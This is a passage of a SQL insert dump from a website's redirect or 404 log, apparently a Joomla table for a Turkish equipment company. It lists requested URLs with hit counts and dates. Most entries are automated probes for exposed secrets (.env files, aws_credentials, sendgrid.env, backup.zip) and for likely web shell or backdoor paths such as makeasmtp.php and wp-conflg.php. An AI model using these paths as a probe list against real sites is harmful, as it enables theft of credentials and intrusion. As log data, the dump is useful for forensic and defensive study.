01:51:08','0000-00-00 00:00:00',301),(36912,'http://3s-technologies.com.tr/conf/.env',NULL,'','',1,0,'2024-11-19 01:51:10','0000-00-00 00:00:00',301),(36913,'http://3s-technologies.com.tr/crm/.env',NULL,'','',1,0,'2024-11-19 01:51:15','0000-00-00 00:00:00',301),(36914,'http://3s-technologies.com.tr/database/.env',NULL,'','',1,0,'2024-11-19 01:51:17','0000-00-00 00:00:00',301),(36915,'http://3s-technologies.com.tr/docs/.env',NULL,'','',1,0,'2024-11-19 01:51:22','0000-00-00 00:00:00',301),(36916,'http://3s-technologies.com.tr/download/.env',NULL,'','',1,0,'2024-11-19 01:51:27','0000-00-00 00:00:00',301),(36917,'http://3s-technologies.com.tr/gists/cache',NULL,'','',1,0,'2024-11-19 01:51:28','0000-00-00 00:00:00',301),(36918,'http://3s-technologies.com.tr/lib/.env',NULL,'','',1,0,'2024-11-19 01:51:31','0000-00-00 00:00:00',301),(36919,'http://3s-technologies.com.tr/library/.env',NULL,'','',1,0,'2024-11-19 01:51:33','0000-00-00 00:00:00',301),(36920,'http://3s-technologies.com.tr/main/.env',NULL,'','',1,0,'2024-11-19 01:51:36','0000-00-00 00:00:00',301),(36921,'http://3s-technologies.com.tr/new/.env',NULL,'','',1,0,'2024-11-19 01:51:38','0000-00-00 00:00:00',301),(36922,'http://3s-technologies.com.tr/newsite/.env',NULL,'','',1,0,'2024-11-19 01:51:39','0000-00-00 00:00:00',301),(36923,'http://3s-technologies.com.tr/old/.env',NULL,'','',1,0,'2024-11-19 01:51:41','0000-00-00 00:00:00',301),(36924,'http://3s-technologies.com.tr/protected/.env',NULL,'','',1,0,'2024-11-19 01:51:43','0000-00-00 00:00:00',301),(36925,'http://3s-technologies.com.tr/redmine/.env',NULL,'','',1,0,'2024-11-19 01:51:47','0000-00-00 00:00:00',301),(36926,'http://3s-technologies.com.tr/sendgrid.env',NULL,'','',1,0,'2024-11-19 01:51:49','0000-00-00 00:00:00',301),(36927,'http://3s-technologies.com.tr/shared/.env',NULL,'','',4,0,'2024-11-19 01:51:51','0000-00-00 00:00:00',301),(36928,'http://3s-technologies.com.tr/sites/all/libraries/mailchimp/.env',NULL,'','',1,0,'2024-11-19 01:51:54','0000-00-00 00:00:00',301),(36929,'http://3s-technologies.com.tr/src/.env',NULL,'','',1,0,'2024-11-19 01:51:55','0000-00-00 00:00:00',301),(36930,'http://3s-technologies.com.tr/storage/.env',NULL,'','',1,0,'2024-11-19 01:51:57','0000-00-00 00:00:00',301),(36931,'http://3s-technologies.com.tr/uploads/.env',NULL,'','',1,0,'2024-11-19 01:51:59','0000-00-00 00:00:00',301),(36932,'http://3s-technologies.com.tr/vendor/.env',NULL,'','',1,0,'2024-11-19 01:52:00','0000-00-00 00:00:00',301),(36933,'http://3s-technologies.com.tr/vendor/laravel/.env',NULL,'','',1,0,'2024-11-19 01:52:02','0000-00-00 00:00:00',301),(36934,'http://3s-technologies.com.tr/web/.env/wp-admin/.env',NULL,'','',1,0,'2024-11-19 01:52:03','0000-00-00 00:00:00',301),(36935,'http://3s-technologies.com.tr/wp-content/.env',NULL,'','',1,0,'2024-11-19 01:52:05','0000-00-00 00:00:00',301),(36936,'http://3s-technologies.com.tr/www/.env',NULL,'','',1,0,'2024-11-19 01:52:06','0000-00-00 00:00:00',301),(36937,'http://3s-technologies.com.tr/__tests__/test-become/.env',NULL,'','',1,0,'2024-11-19 01:52:08','0000-00-00 00:00:00',301),(36938,'https://3s-technologies.com.tr/tr/.jpg',NULL,'https://3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/dalga-lehim/spartan-8s-8d-44-detail?tmpl=component','',2,0,'2024-11-20 10:13:02','0000-00-00 00:00:00',301),(36939,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/trident_full_view.jpg',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/trident_full_view.jpg','',3,0,'2024-11-21 15:09:22','0000-00-00 00:00:00',301),(36940,'http://3s-technologies.com.tr/tr/wp-admin/includes/links.php',NULL,'','',6,0,'2024-11-21 21:46:26','0000-00-00 00:00:00',301),(36941,'http://3s-technologies.com.tr/tr/wp-admin/images/links.php',NULL,'','',6,0,'2024-11-21 21:46:29','0000-00-00 00:00:00',301),(36942,'http://3s-technologies.com.tr/tr/wp-includes/fonts/links.php',NULL,'','',6,0,'2024-11-21 21:46:32','0000-00-00 00:00:00',301),(36943,'http://3s-technologies.com.tr/tr/wp-includes/id3/links.php',NULL,'','',2,0,'2024-11-21 21:46:36','0000-00-00 00:00:00',301),(36944,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/links.php',NULL,'','',2,0,'2024-11-21 21:46:39','0000-00-00 00:00:00',301),(36945,'http://3s-technologies.com.tr/tr/wp-content/upgrade/links.php',NULL,'','',2,0,'2024-11-21 21:46:42','0000-00-00 00:00:00',301),(36946,'http://3s-technologies.com.tr/tr/wp-admin/maint/links.php',NULL,'','',2,0,'2024-11-21 21:46:45','0000-00-00 00:00:00',301),(36947,'http://3s-technologies.com.tr/tr/wp-includes/ixr/links.php',NULL,'','',2,0,'2024-11-21 21:46:47','0000-00-00 00:00:00',301),(36948,'http://3s-technologies.com.tr/en/wp-json',NULL,'','',4,0,'2024-11-21 23:04:15','0000-00-00 00:00:00',301),(36949,'http://3s-technologies.com.tr/tr/wp-admin/css/makeasmtp.php?p=',NULL,'','',3,0,'2024-11-22 01:35:47','0000-00-00 00:00:00',301),(36950,'http://3s-technologies.com.tr/tr/wp-admin/js/makeasmtp.php?p=',NULL,'','',3,0,'2024-11-22 01:35:51','0000-00-00 00:00:00',301),(36951,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/search/makeasmtp.php?p=',NULL,'','',3,0,'2024-11-22 01:35:59','0000-00-00 00:00:00',301),(36952,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/makeasmtp.php?p=',NULL,'','',3,0,'2024-11-22 01:36:03','0000-00-00 00:00:00',301),(36953,'http://3s-technologies.com.tr/tr/wp-includes/certificates/makeasmtp.php?p=',NULL,'','',3,0,'2024-11-22 01:36:07','0000-00-00 00:00:00',301),(36954,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/makeasmtp.php?p=',NULL,'','',3,0,'2024-11-22 01:36:13','0000-00-00 00:00:00',301),(36955,'http://3s-technologies.com.tr/tr/wp-content/uploads/makeasmtp.php?p=',NULL,'','',3,0,'2024-11-22 01:36:17','0000-00-00 00:00:00',301),(36956,'http://3s-technologies.com.tr/tr/e/install/index.php?enews=setdb&f=4',NULL,'','',1,0,'2024-11-22 13:58:56','0000-00-00 00:00:00',301),(36957,'http://3s-technologies.com.tr/tr/forum/wp-login.php',NULL,'http://3s-technologies.com.tr/forum/wp-login.php','',1,0,'2024-11-24 03:47:19','0000-00-00 00:00:00',301),(36958,'http://3s-technologies.com.tr/tr/docs/wp-login.php',NULL,'http://3s-technologies.com.tr/docs/wp-login.php','',1,0,'2024-11-24 18:09:22','0000-00-00 00:00:00',301),(36959,'http://3s-technologies.com.tr/tr/readme.html',NULL,'','',7,0,'2024-11-25 17:19:16','0000-00-00 00:00:00',301),(36960,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=35&language=tr-tr',NULL,'','',1,0,'2024-11-26 05:05:02','0000-00-00 00:00:00',301),(36961,'https://3s-technologies.com.tr/en/templates/beez5/favicon.ico',NULL,'','',2,0,'2024-11-28 03:09:43','0000-00-00 00:00:00',301),(36962,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-45va.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/spr-45va.gif','',3,0,'2024-11-28 03:49:49','0000-00-00 00:00:00',301),(36963,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/a_stencilwasher-eco_s.jpg',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/a_stencilwasher-eco_s.jpg','',2,0,'2024-11-29 03:34:39','0000-00-00 00:00:00',301),(36964,'http://mail.3s-technologies.com.tr/en/ads.txt',NULL,'http://mail.3s-technologies.com.tr/ads.txt','',13,0,'2024-11-29 07:08:33','0000-00-00 00:00:00',301),(36965,'https://mail.3s-technologies.com.tr/en/ads.txt',NULL,'https://mail.3s-technologies.com.tr/ads.txt','',13,0,'2024-11-29 07:08:39','0000-00-00 00:00:00',301),(36966,'http://www.3s-technologies.com.tr/tr/plug/sms/plug.xml',NULL,'http://www.3s-technologies.com.tr/plug/sms/plug.xml','',1,0,'2024-11-29 14:32:22','0000-00-00 00:00:00',301),(36967,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/lfs-1-photo.gif',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/lfs-1-photo.gif','',2,0,'2024-11-30 06:59:14','0000-00-00 00:00:00',301),(36968,'https://3s-technologies.com.tr/en/?format=feed&type=rss',NULL,'','',6,0,'2025-01-11 18:49:44','0000-00-00 00:00:00',301),(36969,'https://3s-technologies.com.tr/en/sellers.json',NULL,'','',1,0,'2025-01-12 10:24:10','0000-00-00 00:00:00',301),(36970,'https://3s-technologies.com.tr/en/media/jui/js/jquery.min.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-01-12 10:24:11','0000-00-00 00:00:00',301),(36971,'https://3s-technologies.com.tr/en/media/jui/js/jquery-noconflict.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-01-12 10:24:12','0000-00-00 00:00:00',301),(36972,'https://3s-technologies.com.tr/en/media/jui/js/jquery-migrate.min.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-01-12 10:24:12','0000-00-00 00:00:00',301),(36973,'https://3s-technologies.com.tr/en/media/system/js/caption.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-01-12 10:24:13','0000-00-00 00:00:00',301),(36974,'https://3s-technologies.com.tr/en/media/system/js/mootools-core.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-01-12 10:24:13','0000-00-00 00:00:00',301),(36975,'https://3s-technologies.com.tr/en/media/system/js/core.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-01-12 10:24:13','0000-00-00 00:00:00',301),(36976,'https://3s-technologies.com.tr/en/media/system/js/mootools-more.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-01-12 10:24:14','0000-00-00 00:00:00',301),(36977,'https://3s-technologies.com.tr/en/templates/beez5/javascript/md_stylechanger.js',NULL,'','',1,0,'2025-01-12 10:24:14','0000-00-00 00:00:00',301),(36978,'https://3s-technologies.com.tr/en/media/djextensions/jquery-easing/jquery.easing.min.js',NULL,'','',1,0,'2025-01-12 10:24:15','0000-00-00 00:00:00',301),(36979,'https://3s-technologies.com.tr/en/modules/mod_djimageslider/assets/js/slider.js?v=4.1.1',NULL,'','',1,0,'2025-01-12 10:24:15','0000-00-00 00:00:00',301),(36980,'https://3s-technologies.com.tr/en/templates/beez5/javascript/hide.js',NULL,'','',1,0,'2025-01-12 10:24:16','0000-00-00 00:00:00',301),(36981,'http://3s-technologies.com.tr/en/wp-content/themes/include.php',NULL,'www.google.com','',3,0,'2025-01-13 07:41:47','0000-00-00 00:00:00',301),(36982,'https://3s-technologies.com.tr/en/wp-content/plugins/core-plugin/include.php',NULL,'','',6,0,'2025-01-13 11:36:40','0000-00-00 00:00:00',301),(36983,'https://3s-technologies.com.tr/en/wp-includes/images/include.php',NULL,'','',8,0,'2025-01-13 11:36:41','0000-00-00 00:00:00',301),(36984,'http://3s-technologies.com.tr/en/temp',NULL,'www.google.com','',12,0,'2025-01-13 11:55:26','0000-00-00 00:00:00',301),(36985,'http://www.3s-technologies.com.tr/en/wp',NULL,'www.google.com','',2,0,'2025-01-13 12:18:43','0000-00-00 00:00:00',301),(36986,'http://www.3s-technologies.com.tr/en/wordpress',NULL,'www.google.com','',2,0,'2025-01-13 12:18:51','0000-00-00 00:00:00',301),(36987,'http://www.3s-technologies.com.tr/en/old',NULL,'www.google.com','',1,0,'2025-01-13 12:19:11','0000-00-00 00:00:00',301),(36988,'http://www.3s-technologies.com.tr/en/backup',NULL,'www.google.com','',1,0,'2025-01-13 12:19:17','0000-00-00 00:00:00',301),(36989,'http://www.3s-technologies.com.tr/en/new',NULL,'www.google.com','',1,0,'2025-01-13 12:19:23','0000-00-00 00:00:00',301),(36990,'http://www.3s-technologies.com.tr/en/temp',NULL,'www.google.com','',1,0,'2025-01-13 12:19:44','0000-00-00 00:00:00',301),(36991,'http://www.3s-technologies.com.tr/en/blog',NULL,'www.google.com','',1,0,'2025-01-13 12:19:50','0000-00-00 00:00:00',301),(36992,'http://3s-technologies.com.tr/en/wp-ver.php',NULL,'www.google.com','',2,0,'2025-01-13 19:58:52','0000-00-00 00:00:00',301),(36993,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_12.jpg',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/avb_12.jpg','',2,0,'2025-01-14 02:22:17','0000-00-00 00:00:00',301),(36994,'http://3s-technologies.com.tr/tr/wp-content/plugins/simple/simple.php',NULL,'','',85,0,'2025-01-15 17:05:07','0000-00-00 00:00:00',301),(36995,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php',NULL,'','',76,0,'2025-01-15 17:05:08','0000-00-00 00:00:00',301),(36996,'http://3s-technologies.com.tr/tr/wp-content/plugins/awesome-coming-soon/come.php',NULL,'','',32,0,'2025-01-15 17:05:09','0000-00-00 00:00:00',301),(36997,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-conflg.php',NULL,'','',108,0,'2025-01-15 17:05:10','0000-00-00 00:00:00',301),(36998,'http://3s-technologies.com.tr/tr/berlin.php',NULL,'','',64,0,'2025-01-15 17:05:11','0000-00-00 00:00:00',301),(36999,'https://3s-technologies.com.tr/tr/panel',NULL,'','',2,0,'2025-01-17 15:00:14','0000-00-00 00:00:00',301),(37000,'https://3s-technologies.com.tr/tr/yonetim',NULL,'','',2,0,'2025-01-17 15:00:15','0000-00-00 00:00:00',301),(37001,'https://www.3s-technologies.com.tr/en/ads.txt',NULL,'https://www.3s-technologies.com.tr/ads.txt','',12,0,'2025-01-18 12:57:29','0000-00-00 00:00:00',301),(37002,'http://3s-technologies.com.tr/tr/backup.zip',NULL,'','',13,0,'2025-01-18 20:47:27','0000-00-00 00:00:00',301),(37003,'http://3s-technologies.com.tr/tr/config/env',NULL,'','',1,0,'2025-01-19 06:42:15','0000-00-00 00:00:00',301),(37004,'http://3s-technologies.com.tr/tr/settings/.env',NULL,'','',1,0,'2025-01-19 06:42:16','0000-00-00 00:00:00',301),(37005,'http://3s-technologies.com.tr/tr/settings/env',NULL,'','',1,0,'2025-01-19 06:42:17','0000-00-00 00:00:00',301),(37006,'http://3s-technologies.com.tr/tr/environment/.env',NULL,'','',1,0,'2025-01-19 06:42:18','0000-00-00 00:00:00',301),(37007,'http://3s-technologies.com.tr/tr/environment/env',NULL,'','',1,0,'2025-01-19 06:42:19','0000-00-00 00:00:00',301),(37008,'http://3s-technologies.com.tr/tr/secrets/.env',NULL,'','',1,0,'2025-01-19 06:42:20','0000-00-00 00:00:00',301),(37009,'http://3s-technologies.com.tr/tr/secrets/env',NULL,'','',1,0,'2025-01-19 06:42:21','0000-00-00 00:00:00',301),(37010,'http://3s-technologies.com.tr/tr/config/settings/.env',NULL,'','',1,0,'2025-01-19 06:42:22','0000-00-00 00:00:00',301),(37011,'http://3s-technologies.com.tr/tr/config/settings/env',NULL,'','',1,0,'2025-01-19 06:42:23','0000-00-00 00:00:00',301),(37012,'http://3s-technologies.com.tr/tr/config/environment/.env',NULL,'','',1,0,'2025-01-19 06:42:24','0000-00-00 00:00:00',301),(37013,'http://3s-technologies.com.tr/tr/config/environment/env',NULL,'','',1,0,'2025-01-19 06:42:25','0000-00-00 00:00:00',301),(37014,'http://3s-technologies.com.tr/tr/config/secrets/.env',NULL,'','',1,0,'2025-01-19 06:42:25','0000-00-00 00:00:00',301),(37015,'http://3s-technologies.com.tr/tr/config/secrets/env',NULL,'','',1,0,'2025-01-19 06:42:26','0000-00-00 00:00:00',301),(37016,'http://3s-technologies.com.tr/tr/app/env',NULL,'','',1,0,'2025-01-19 06:42:28','0000-00-00 00:00:00',301),(37017,'http://3s-technologies.com.tr/tr/application/.env',NULL,'','',2,0,'2025-01-19 06:42:29','0000-00-00 00:00:00',301),(37018,'http://3s-technologies.com.tr/tr/application/env',NULL,'','',1,0,'2025-01-19 06:42:30','0000-00-00 00:00:00',301),(37019,'http://3s-technologies.com.tr/tr/deploy/.env',NULL,'','',1,0,'2025-01-19 06:42:31','0000-00-00 00:00:00',301),(37020,'http://3s-technologies.com.tr/tr/deploy/env',NULL,'','',1,0,'2025-01-19 06:42:32','0000-00-00 00:00:00',301),(37021,'http://3s-technologies.com.tr/tr/deployment/.env',NULL,'','',1,0,'2025-01-19 06:42:33','0000-00-00 00:00:00',301),(37022,'http://3s-technologies.com.tr/tr/deployment/env',NULL,'','',1,0,'2025-01-19 06:42:33','0000-00-00 00:00:00',301),(37023,'http://3s-technologies.com.tr/tr/env/.env',NULL,'','',4,0,'2025-01-19 06:42:34','0000-00-00 00:00:00',301),(37024,'http://3s-technologies.com.tr/tr/env/env',NULL,'','',1,0,'2025-01-19 06:42:35','0000-00-00 00:00:00',301),(37025,'http://3s-technologies.com.tr/tr/environments/.env',NULL,'','',3,0,'2025-01-19 06:42:36','0000-00-00 00:00:00',301),(37026,'http://3s-technologies.com.tr/tr/environments/env',NULL,'','',1,0,'2025-01-19 06:42:37','0000-00-00 00:00:00',301),(37027,'http://3s-technologies.com.tr/tr/vars/.env',NULL,'','',1,0,'2025-01-19 06:42:38','0000-00-00 00:00:00',301),(37028,'http://3s-technologies.com.tr/tr/vars/env',NULL,'','',1,0,'2025-01-19 06:42:39','0000-00-00 00:00:00',301),(37029,'http://3s-technologies.com.tr/tr/variables/.env',NULL,'','',1,0,'2025-01-19 06:42:40','0000-00-00 00:00:00',301),(37030,'http://3s-technologies.com.tr/tr/variables/env',NULL,'','',1,0,'2025-01-19 06:42:41','0000-00-00 00:00:00',301),(37031,'http://3s-technologies.com.tr/tr/backend/config/.env',NULL,'','',2,0,'2025-01-19 06:42:42','0000-00-00 00:00:00',301),(37032,'http://3s-technologies.com.tr/tr/.env.old',NULL,'','',3,0,'2025-01-19 06:42:44','0000-00-00 00:00:00',301),(37033,'http://3s-technologies.com.tr/tr/.env_backup',NULL,'','',1,0,'2025-01-19 06:42:45','0000-00-00 00:00:00',301),(37034,'http://3s-technologies.com.tr/tr/.env.tmp',NULL,'','',1,0,'2025-01-19 06:42:46','0000-00-00 00:00:00',301),(37035,'http://3s-technologies.com.tr/tr/temp/.env',NULL,'','',1,0,'2025-01-19 06:42:48','0000-00-00 00:00:00',301),(37036,'http://3s-technologies.com.tr/tr/backup/.env',NULL,'','',2,0,'2025-01-19 06:42:49','0000-00-00 00:00:00',301),(37037,'http://mail.3s-technologies.com.tr/en/temp',NULL,'www.google.com','',4,0,'2025-01-19 16:49:46','0000-00-00 00:00:00',301),(37038,'http://3s-technologies.com.tr/tr/aws_credentials?type=rau',NULL,'http://3s-technologies.com.tr/aws_credentials?type=rau','',1,0,'2025-01-19 23:44:54','0000-00-00 00:00:00',301),(37039,'http://3s-technologies.com.tr/tr/.env/backup?type=rau',NULL,'http://3s-technologies.com.tr/.env/backup?type=rau','',1,0,'2025-01-20 00:02:57','0000-00-00 00:00:00',301),(37040,'http://3s-technologies.com.tr/tr/.env/dist?type=rau',NULL,'http://3s-technologies.com.tr/.env/dist?type=rau','',1,0,'2025-01-20 00:05:22','0000-00-00 00:00:00',301),(37041,'http://3s-technologies.com.tr/tr/.env_exemple?type=rau',NULL,'http://3s-technologies.com.tr/.env_exemple?type=rau','',1,0,'2025-01-20 00:09:13','0000-00-00 00:00:00',301),(37042,'http://3s-technologies.com.tr/tr/.envs/.production/.django?type=rau',NULL,'http://3s-technologies.com.tr/.envs/.production/.django?type=rau','',1,0,'2025-01-20 00:13:38','0000-00-00 00:00:00',301),(37043,'http://3s-technologies.com.tr/tr/administrator/.env?type=rau',NULL,'http://3s-technologies.com.tr/administrator/.env?type=rau','',1,0,'2025-01-20 00:17:34','0000-00-00 00:00:00',301),(37044,'http://3s-technologies.com.tr/tr/core/datavase/.env?type=rau',NULL,'http://3s-technologies.com.tr/core/Datavase/.env?type=rau','',1,0,'2025-01-20 00:30:23','0000-00-00 00:00:00',301),(37045,'http://3s-technologies.com.tr/tr/core/app/.env?type=rau',NULL,'http://3s-technologies.com.tr/core/app/.env?type=rau','',1,0,'2025-01-20 00:31:02','0000-00-00 00:00:00',301),(37046,'http://3s-technologies.com.tr/tr/cron/.env?type=rau',NULL,'http://3s-technologies.com.tr/cron/.env?type=rau','',1,0,'2025-01-20 00:33:31','0000-00-00 00:00:00',301),(37047,'http://3s-technologies.com.tr/tr/cronlab/.env?type=rau',NULL,'http://3s-technologies.com.tr/cronlab/.env?type=rau','',1,0,'2025-01-20 00:34:33','0000-00-00 00:00:00',301),(37048,'http://3s-technologies.com.tr/tr/exapi/.env?type=rau',NULL,'http://3s-technologies.com.tr/exapi/.env?type=rau','',1,0,'2025-01-20 00:39:00','0000-00-00 00:00:00',301),(37049,'http://3s-technologies.com.tr/tr/lab/.env?type=rau',NULL,'http://3s-technologies.com.tr/lab/.env?type=rau','',1,0,'2025-01-20 00:41:16','0000-00-00 00:00:00',301),(37050,'http://3s-technologies.com.tr/tr/assets/lib/sendgrid/sendgrid.env?type=rau',NULL,'http://3s-technologies.com.tr/assets/lib/sendgrid/sendgrid.env?type=rau','',1,0,'2025-01-20 00:43:05','0000-00-00 00:00:00',301),(37051,'http://3s-technologies.com.tr/tr/lib/.env?type=rau',NULL,'http://3s-technologies.com.tr/lib/.env?type=rau','',1,0,'2025-01-20 00:45:21','0000-00-00 00:00:00',301),(37052,'http://3s-technologies.com.tr/tr/psnlink/.env?type=rau',NULL,'http://3s-technologies.com.tr/psnlink/.env?type=rau','',1,0,'2025-01-20 00:47:40','0000-00-00 00:00:00',301),(37053,'http://3s-technologies.com.tr/tr/saas/.env?type=rau',NULL,'http://3s-technologies.com.tr/saas/.env?type=rau','',1,0,'2025-01-20 00:49:51','0000-00-00 00:00:00',301),(37054,'http://3s-technologies.com.tr/tr/site/.env?type=rau',NULL,'http://3s-technologies.com.tr/site/.env?type=rau','',1,0,'2025-01-20 00:51:42','0000-00-00 00:00:00',301),(37055,'http://3s-technologies.com.tr/tr/sitemaps/.env?type=rau',NULL,'http://3s-technologies.com.tr/sitemaps/.env?type=rau','',1,0,'2025-01-20 00:53:37','0000-00-00 00:00:00',301),(37056,'http://3s-technologies.com.tr/tr/tools/.env?type=rau',NULL,'http://3s-technologies.com.tr/tools/.env?type=rau','',1,0,'2025-01-20 00:55:35','0000-00-00 00:00:00',301),(37057,'http://3s-technologies.com.tr/tr/uploads/.env?type=rau',NULL,'http://3s-technologies.com.tr/uploads/.env?type=rau','',1,0,'2025-01-20 00:56:05','0000-00-00 00:00:00',301),(37058,'http://3s-technologies.com.tr/tr/v1/.env?type=rau',NULL,'http://3s-technologies.com.tr/v1/.env?type=rau','',1,0,'2025-01-20 00:58:09','0000-00-00 00:00:00',301),(37059,'http://3s-technologies.com.tr/tr/v2/.env?type=rau',NULL,'http://3s-technologies.com.tr/v2/.env?type=rau','',1,0,'2025-01-20 01:00:11','0000-00-00 00:00:00',301),(37060,'http://3s-technologies.com.tr/tr/web/.env?type=rau',NULL,'http://3s-technologies.com.tr/web/.env?type=rau','',1,0,'2025-01-20 01:02:12','0000-00-00 00:00:00',301),(37061,'http://3s-technologies.com.tr/tr/admin-app/.env?type=rau',NULL,'http://3s-technologies.com.tr/admin-app/.env?type=rau','',1,0,'2025-01-20 01:04:23','0000-00-00 00:00:00',301),(37062,'http://3s-technologies.com.tr/tr/api/config.env?type=rau',NULL,'http://3s-technologies.com.tr/api/config.env?type=rau','',1,0,'2025-01-20 01:06:01','0000-00-00 00:00:00',301),(37063,'http://3s-technologies.com.tr/tr/api/shared/.env?type=rau',NULL,'http://3s-technologies.com.tr/api/shared/.env?type=rau','',1,0,'2025-01-20 01:07:44','0000-00-00 00:00:00',301),(37064,'http://3s-technologies.com.tr/tr/api/shared/config.env?type=rau',NULL,'http://3s-technologies.com.tr/api/shared/config.env?type=rau','',1,0,'2025-01-20 01:08:03','0000-00-00 00:00:00',301),(37065,'http://3s-technologies.com.tr/tr/api/shared/config/.env?type=rau',NULL,'http://3s-technologies.com.tr/api/shared/config/.env?type=rau','',1,0,'2025-01-20 01:10:13','0000-00-00 00:00:00',301),(37066,'http://3s-technologies.com.tr/tr/api/shared/config/config.env?type=rau',NULL,'http://3s-technologies.com.tr/api/shared/config/config.env?type=rau','',1,0,'2025-01-20 01:11:56','0000-00-00 00:00:00',301),(37067,'http://3s-technologies.com.tr/tr/app/src/.env?type=rau',NULL,'http://3s-technologies.com.tr/app/src/.env?type=rau','',1,0,'2025-01-20 01:14:57','0000-00-00 00:00:00',301),(37068,'http://3s-technologies.com.tr/tr/aws.env?type=rau',NULL,'http://3s-technologies.com.tr/aws.env?type=rau','',1,0,'2025-01-20 01:18:38','0000-00-00 00:00:00',301),(37069,'http://3s-technologies.com.tr/tr/awstats/.env?type=rau',NULL,'http://3s-technologies.com.tr/awstats/.env?type=rau','',2,0,'2025-01-20 01:20:09','0000-00-00 00:00:00',301),(37070,'http://3s-technologies.com.tr/tr/back/.env?type=rau',NULL,'http://3s-technologies.com.tr/back/.env?type=rau','',1,0,'2025-01-20 01:21:35','0000-00-00 00:00:00',301),(37071,'http://3s-technologies.com.tr/tr/backend/.env?type=rau',NULL,'http://3s-technologies.com.tr/backend/.env?type=rau','',2,0,'2025-01-20 01:22:57','0000-00-00 00:00:00',301),(37072,'http://3s-technologies.com.tr/tr/blog.env?type=rau',NULL,'http://3s-technologies.com.tr/blog.env?type=rau','',1,0,'2025-01-20 01:29:35','0000-00-00 00:00:00',301),(37073,'http://3s-technologies.com.tr/tr/blogs/.env?type=rau',NULL,'http://3s-technologies.com.tr/blogs/.env?type=rau','',1,0,'2025-01-20 01:32:49','0000-00-00 00:00:00',301),(37074,'http://3s-technologies.com.tr/tr/cfg/.env?type=rau',NULL,'http://3s-technologies.com.tr/cfg/.env?type=rau','',1,0,'2025-01-20 01:34:09','0000-00-00 00:00:00',301),(37075,'http://3s-technologies.com.tr/tr/client/.env?type=rau',NULL,'http://3s-technologies.com.tr/client/.env?type=rau','',1,0,'2025-01-20 01:36:25','0000-00-00 00:00:00',301),(37076,'http://3s-technologies.com.tr/tr/cms/.env?type=rau',NULL,'http://3s-technologies.com.tr/cms/.env?type=rau','',1,0,'2025-01-20 01:37:40','0000-00-00 00:00:00',301),(37077,'http://3s-technologies.com.tr/tr/config.env\'?type=rau',NULL,'http://3s-technologies.com.tr/config.env\'?type=rau','',1,0,'2025-01-20 01:42:36','0000-00-00 00:00:00',301),(37078,'http://3s-technologies.com.tr/tr/config/env/.env?type=rau',NULL,'http://3s-technologies.com.tr/config/env/.env?type=rau','',1,0,'2025-01-20 01:43:18','0000-00-00 00:00:00',301),(37079,'http://3s-technologies.com.tr/tr/config/settings.env?type=rau',NULL,'http://3s-technologies.com.tr/config/settings.env?type=rau','',1,0,'2025-01-20 01:44:21','0000-00-00 00:00:00',301),(37080,'http://3s-technologies.com.tr/tr/configuration/.env?type=rau',NULL,'http://3s-technologies.com.tr/configuration/.env?type=rau','',1,0,'2025-01-20 01:46:51','0000-00-00 00:00:00',301),(37081,'http://3s-technologies.com.tr/tr/demo/.env?type=rau',NULL,'http://3s-technologies.com.tr/demo/.env?type=rau','',1,0,'2025-01-20 01:50:40','0000-00-00 00:00:00',301),(37082,'http://3s-technologies.com.tr/tr/developer/.env?type=rau',NULL,'http://3s-technologies.com.tr/developer/.env?type=rau','',1,0,'2025-01-20 01:53:02','0000-00-00 00:00:00',301),(37083,'http://3s-technologies.com.tr/tr/development/.env?type=rau',NULL,'http://3s-technologies.com.tr/development/.env?type=rau','',1,0,'2025-01-20 01:53:53','0000-00-00 00:00:00',301),(37084,'http://3s-technologies.com.tr/tr/docker/.env?type=rau',NULL,'http://3s-technologies.com.tr/docker/.env?type=rau','',1,0,'2025-01-20 01:55:27','0000-00-00 00:00:00',301),(37085,'http://3s-technologies.com.tr/tr/docker/app/.env?type=rau',NULL,'http://3s-technologies.com.tr/docker/app/.env?type=rau','',1,0,'2025-01-20 01:56:46','0000-00-00 00:00:00',301),(37086,'http://3s-technologies.com.tr/tr/docs/.env?type=rau',NULL,'http://3s-technologies.com.tr/docs/.env?type=rau','',1,0,'2025-01-20 01:58:02','0000-00-00 00:00:00',301),(37087,'http://3s-technologies.com.tr/tr/download/.env?type=rau',NULL,'http://3s-technologies.com.tr/download/.env?type=rau','',1,0,'2025-01-20 02:00:13','0000-00-00 00:00:00',301),(37088,'http://3s-technologies.com.tr/tr/enviroments/.env?type=rau',NULL,'http://3s-technologies.com.tr/enviroments/.env?type=rau','',1,0,'2025-01-20 02:01:59','0000-00-00 00:00:00',301),(37089,'http://3s-technologies.com.tr/tr/etc/.env?type=rau',NULL,'http://3s-technologies.com.tr/etc/.env?type=rau','',1,0,'2025-01-20 02:03:28','0000-00-00 00:00:00',301),(37090,'http://3s-technologies.com.tr/tr/etc/env/.env?type=rau',NULL,'http://3s-technologies.com.tr/etc/env/.env?type=rau','',1,0,'2025-01-20 02:04:49','0000-00-00 00:00:00',301),(37091,'http://3s-technologies.com.tr/tr/framework/.env?type=rau',NULL,'http://3s-technologies.com.tr/framework/.env?type=rau','',1,0,'2025-01-20 